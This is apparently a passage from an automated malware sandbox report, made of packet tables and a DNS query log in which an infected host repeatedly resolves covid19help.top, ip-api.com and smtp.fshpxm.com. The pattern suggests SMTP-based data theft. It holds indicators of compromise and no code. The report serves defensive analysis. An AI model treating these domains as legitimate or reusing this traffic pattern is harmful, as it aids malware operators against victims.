                                                                                      Apr 18, 2024 10:25:24.842350960 CEST53519558.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:24.844057083 CEST5195553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:24.948928118 CEST53519558.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:24.952094078 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:25.561140060 CEST5897153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:25.665827036 CEST53589718.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:25.666066885 CEST5897153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:25.704354048 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:25.770854950 CEST53589718.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:25.772541046 CEST5897153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:25.877036095 CEST53589718.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:25.877403975 CEST5897153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:25.982014894 CEST53589718.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:25.982223034 CEST5897153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:26.086823940 CEST53589718.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:26.087409973 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:26.468759060 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:26.843175888 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:27.240612030 CEST5101453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.345094919 CEST53510148.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.345319033 CEST5101453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.449523926 CEST53510148.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.449717045 CEST5101453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.554789066 CEST53510148.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.554932117 CEST5101453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.607552052 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:27.659209013 CEST53510148.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.662209034 CEST5101453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.766480923 CEST53510148.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.773974895 CEST4969053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.878813028 CEST53496908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.879113913 CEST4969053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:27.983660936 CEST53496908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:27.984003067 CEST4969053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.088468075 CEST53496908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.089175940 CEST4969053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.195133924 CEST53496908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.195342064 CEST4969053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.299817085 CEST53496908.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.300882101 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:28.379762888 CEST6016953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.485383034 CEST53601698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.485917091 CEST6016953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.590337038 CEST53601698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.590712070 CEST6016953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.695373058 CEST53601698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.695720911 CEST6016953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.802272081 CEST53601698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.802583933 CEST6016953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:28.907179117 CEST53601698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:28.907737017 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:29.058368921 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:29.666779995 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:29.822777987 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:30.431184053 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:31.203442097 CEST5306053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:31.307966948 CEST53530608.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:31.308289051 CEST5306053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:31.412848949 CEST53530608.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:31.413068056 CEST5306053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:31.518158913 CEST53530608.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:31.518390894 CEST5306053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:31.623239994 CEST53530608.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:31.623454094 CEST5306053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:31.727821112 CEST53530608.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:31.728501081 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:32.490385056 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:33.254784107 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:34.036279917 CEST4994953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:34.140799999 CEST53499498.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:34.143178940 CEST5402753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:34.247992992 CEST53540278.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:51.606429100 CEST138138192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:32.683054924 CEST6395053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:32.787522078 CEST53639508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:32.788002014 CEST6395053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:32.892467976 CEST53639508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:32.892724991 CEST6395053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:32.997035027 CEST53639508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:32.997262955 CEST6395053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:33.109421015 CEST53639508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:33.109623909 CEST6395053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:33.213954926 CEST53639508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:33.214474916 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:33.970686913 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:34.736315012 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:35.526380062 CEST5825753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:35.631203890 CEST53582578.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:35.631419897 CEST5825753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:35.735760927 CEST53582578.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:35.736143112 CEST5825753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:35.840533972 CEST53582578.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:35.840867043 CEST5825753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:35.945709944 CEST53582578.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:35.945952892 CEST5825753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:36.050945997 CEST53582578.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:36.053005934 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:36.809410095 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:37.573812008 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:45.269303083 CEST5473853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.374011993 CEST53547388.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.468240023 CEST4947853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.573041916 CEST53494788.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.573307991 CEST4947853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.677819967 CEST53494788.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.678051949 CEST4947853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.782831907 CEST53494788.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.783088923 CEST4947853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.887547970 CEST53494788.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.887870073 CEST4947853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:45.992455959 CEST53494788.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:45.993232965 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:46.746653080 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:47.514313936 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:26:48.922852993 CEST4928853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:49.027340889 CEST53492888.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:49.027551889 CEST4928853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:49.132123947 CEST53492888.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:26:49.133200884 CEST4928853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:26:49.237709999 CEST53492888.8.8.8192.168.2.22

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Apr 18, 2024 10:23:54.159703016 CEST192.168.2.228.8.8.80xb979Standard query (0)covid19help.topA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:00.799091101 CEST192.168.2.228.8.8.80x1d8dStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.615402937 CEST192.168.2.228.8.8.80x2a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.628129959 CEST192.168.2.228.8.8.80x88b4Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.771320105 CEST192.168.2.228.8.8.80x88b4Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.808079958 CEST192.168.2.228.8.8.80x2a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.879147053 CEST192.168.2.228.8.8.80x88b4Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.915832043 CEST192.168.2.228.8.8.80x2a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:02.984481096 CEST192.168.2.228.8.8.80x88b4Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.021029949 CEST192.168.2.228.8.8.80x2a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.135205984 CEST192.168.2.228.8.8.80x88b4Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:03.155044079 CEST192.168.2.228.8.8.80xe8aeStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.574213982 CEST192.168.2.228.8.8.80x9601Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:05.680083990 CEST192.168.2.228.8.8.80x9601Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.269649982 CEST192.168.2.228.8.8.80x8774Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:07.595623016 CEST192.168.2.228.8.8.80x8774Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.245851994 CEST192.168.2.228.8.8.80x6143Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.352066994 CEST192.168.2.228.8.8.80x6143Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.486450911 CEST192.168.2.228.8.8.80x6143Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.591933012 CEST192.168.2.228.8.8.80x6143Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.697343111 CEST192.168.2.228.8.8.80x6143Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:08.906383991 CEST192.168.2.228.8.8.80xf38aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:09.026467085 CEST192.168.2.228.8.8.80xf38aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.045865059 CEST192.168.2.228.8.8.80x5051Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.085376978 CEST192.168.2.228.8.8.80xe35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.151242971 CEST192.168.2.228.8.8.80x5051Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.193487883 CEST192.168.2.228.8.8.80xe35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.256594896 CEST192.168.2.228.8.8.80x5051Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.299745083 CEST192.168.2.228.8.8.80xe35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.362513065 CEST192.168.2.228.8.8.80x5051Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.408123016 CEST192.168.2.228.8.8.80xe35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.469623089 CEST192.168.2.228.8.8.80x5051Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:10.537807941 CEST192.168.2.228.8.8.80xe35aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.118777037 CEST192.168.2.228.8.8.80x3569Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.223653078 CEST192.168.2.228.8.8.80x3569Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.328952074 CEST192.168.2.228.8.8.80x3569Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.434425116 CEST192.168.2.228.8.8.80x3569Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.735070944 CEST192.168.2.228.8.8.80xe23aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:11.839986086 CEST192.168.2.228.8.8.80xe23aStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:12.889708042 CEST192.168.2.228.8.8.80xb656Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.000824928 CEST192.168.2.228.8.8.80xb656Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.106060028 CEST192.168.2.228.8.8.80xb656Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.213027000 CEST192.168.2.228.8.8.80xb656Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.328210115 CEST192.168.2.228.8.8.80x428fStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:13.433931112 CEST192.168.2.228.8.8.80x428fStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.186202049 CEST192.168.2.228.8.8.80x47b9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.292258024 CEST192.168.2.228.8.8.80x47b9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.398127079 CEST192.168.2.228.8.8.80x47b9Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.508918047 CEST192.168.2.228.8.8.80x3ef7Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.614180088 CEST192.168.2.228.8.8.80x3ef7Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.719212055 CEST192.168.2.228.8.8.80x3ef7Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.824076891 CEST192.168.2.228.8.8.80x3ef7Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:33.929028034 CEST192.168.2.228.8.8.80x3ef7Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:36.190516949 CEST192.168.2.228.8.8.80x5803Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:36.296114922 CEST192.168.2.228.8.8.80x5803Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:36.416476965 CEST192.168.2.228.8.8.80x53dfStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:40.270355940 CEST192.168.2.228.8.8.80x9f09Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:40.375076056 CEST192.168.2.228.8.8.80x9f09Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:40.480314016 CEST192.168.2.228.8.8.80x9f09Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:40.585977077 CEST192.168.2.228.8.8.80x9f09Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:40.690572023 CEST192.168.2.228.8.8.80x9f09Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.091598034 CEST192.168.2.228.8.8.80xe539Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.196609020 CEST192.168.2.228.8.8.80xe539Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.304195881 CEST192.168.2.228.8.8.80xe539Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.415754080 CEST192.168.2.228.8.8.80xaa71Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.520919085 CEST192.168.2.228.8.8.80xaa71Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.626255989 CEST192.168.2.228.8.8.80xaa71Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.731726885 CEST192.168.2.228.8.8.80xaa71Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:43.836632013 CEST192.168.2.228.8.8.80xaa71Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:45.251007080 CEST192.168.2.228.8.8.80xcba8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:45.356280088 CEST192.168.2.228.8.8.80xcba8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:45.461335897 CEST192.168.2.228.8.8.80xcba8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:45.566353083 CEST192.168.2.228.8.8.80xcba8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:45.671411991 CEST192.168.2.228.8.8.80xcba8Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.068439007 CEST192.168.2.228.8.8.80xb268Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.088229895 CEST192.168.2.228.8.8.80x9cf6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.173419952 CEST192.168.2.228.8.8.80xb268Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.193481922 CEST192.168.2.228.8.8.80x9cf6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.284744024 CEST192.168.2.228.8.8.80xce28Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.300290108 CEST192.168.2.228.8.8.80x46b6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.390090942 CEST192.168.2.228.8.8.80xce28Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.405225039 CEST192.168.2.228.8.8.80x46b6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.495392084 CEST192.168.2.228.8.8.80xce28Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.509839058 CEST192.168.2.228.8.8.80x46b6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.600399971 CEST192.168.2.228.8.8.80xce28Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.614787102 CEST192.168.2.228.8.8.80x46b6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.705403090 CEST192.168.2.228.8.8.80xce28Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:48.719336033 CEST192.168.2.228.8.8.80x46b6Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:55.998702049 CEST192.168.2.228.8.8.80x56a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:56.104008913 CEST192.168.2.228.8.8.80x56a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:56.209227085 CEST192.168.2.228.8.8.80x56a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:56.316143990 CEST192.168.2.228.8.8.80x56a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:56.421596050 CEST192.168.2.228.8.8.80x56a1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:58.818582058 CEST192.168.2.228.8.8.80xfa89Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:58.924282074 CEST192.168.2.228.8.8.80xfa89Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:24:59.029728889 CEST192.168.2.228.8.8.80xfa89Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:04.520359993 CEST192.168.2.228.8.8.80xfa89Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:05.510601044 CEST192.168.2.228.8.8.80x46b0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:05.615855932 CEST192.168.2.228.8.8.80x46b0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:05.721180916 CEST192.168.2.228.8.8.80x46b0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:05.826286077 CEST192.168.2.228.8.8.80x46b0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:05.931731939 CEST192.168.2.228.8.8.80x46b0Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:07.478336096 CEST192.168.2.228.8.8.80x6167Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:07.584295034 CEST192.168.2.228.8.8.80x6167Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:07.689439058 CEST192.168.2.228.8.8.80x6167Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:07.794723988 CEST192.168.2.228.8.8.80x6167Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:07.899849892 CEST192.168.2.228.8.8.80x6167Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:08.530057907 CEST192.168.2.228.8.8.80x379dStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:08.635113001 CEST192.168.2.228.8.8.80x379dStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:08.740108967 CEST192.168.2.228.8.8.80x379dStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:08.845124960 CEST192.168.2.228.8.8.80x379dStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:08.950258017 CEST192.168.2.228.8.8.80x379dStandard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:09.996020079 CEST192.168.2.228.8.8.80x20b1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.101686954 CEST192.168.2.228.8.8.80x20b1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.206945896 CEST192.168.2.228.8.8.80x20b1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.302309036 CEST192.168.2.228.8.8.80x43d1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.311800957 CEST192.168.2.228.8.8.80x20b1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
                                                                                      Apr 18, 2024 10:25:10.407263041 CEST192.168.2.228.8.8.80x43d1Standard query (0)smtp.fshpxm.comA (IP address)IN (0x0001)false
